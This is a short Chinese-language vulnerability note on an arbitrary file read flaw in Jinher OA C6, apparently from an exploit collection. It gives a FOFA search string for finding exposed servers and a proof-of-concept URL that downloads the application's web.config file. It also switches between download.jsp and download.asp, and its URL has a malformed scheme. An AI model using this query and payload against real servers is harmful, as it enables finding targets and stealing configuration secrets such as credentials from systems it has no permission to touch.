金和OA C6 download.jsp 任意文件读取漏洞

金和OA C6 download.jsp 任意文件读取漏洞

漏洞描述

金和OA C6 download.jsp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息

漏洞影响

金和OA

FOFA

app="Jinher-OA"

漏洞产生文件为 download.asp

POC构造

 

http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

随后就下载一个Web.config文件

END!!!